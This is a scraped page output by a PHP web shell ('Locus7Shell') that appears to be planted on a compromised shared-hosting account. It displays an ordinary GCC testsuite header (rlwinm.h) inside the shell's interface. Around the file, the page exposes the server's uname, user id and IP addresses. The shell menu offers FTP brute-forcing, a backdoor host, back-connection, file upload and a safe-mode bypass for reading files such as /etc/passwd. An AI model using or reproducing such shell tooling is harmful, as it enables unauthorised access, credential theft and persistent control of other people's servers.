Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/powerpc/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     rlwinm.h (1.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
typedef unsigned int u32;

static inline u32 rot(u32 x, u32 n, u32 mb, u32 me)
{
    u32 y = x;

    if (n)
        x = 0
#ifdef SL
        | (x << n)
#endif
#ifdef SR
        | (x >> (32 - n))
#endif
        ;

    u32 s = -1;
    if (n)
        s = 0
#ifdef SL
        | (s << n)
#endif
#ifdef SR
        | (s >> (32 - n))
#endif
        ;

    u32 mask = 0;
    mask += 1U << (31 - mb);
    mask += 1U << (31 - mb);
    mask -= 1U << (31 - me);
    mask -= (mb > me);

    if (mask & ~s)
        return 12345*y;

    return x & mask;
}

#define X3(N,B,E) \
u32 f_##N##_##B##_##E(u32 x) { return rot(x,N,B,E); } \

#define X2(N,B) \
X3(N,B,0) \
X3(N,B,1) \
X3(N,B,2) \
X3(N,B,7) \
X3(N,B,8) \
X3(N,B,9) \
X3(N,B,15) \
X3(N,B,16) \
X3(N,B,17) \
X3(N,B,23) \
X3(N,B,24) \
X3(N,B,25) \
X3(N,B,29) \
X3(N,B,30) \
X3(N,B,31)
#define X1(N) \
X2(N,0) \
X2(N,1) \
X2(N,2) \
X2(N,7) \
X2(N,8) \
X2(N,9) \
X2(N,15) \
X2(N,16) \
X2(N,17) \
X2(N,23) \
X2(N,24) \
X2(N,25) \
X2(N,29) \
X2(N,30) \
X2(N,31)
#define X() \
X1(0) \
X1(1) \
X1(2) \
X1(7) \
X1(8) \
X1(9) \
X1(15) \
X1(16) \
X1(17) \
X1(23) \
X1(24) \
X1(25) \
X1(29) \
X1(30) \
X1(31)

X()

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--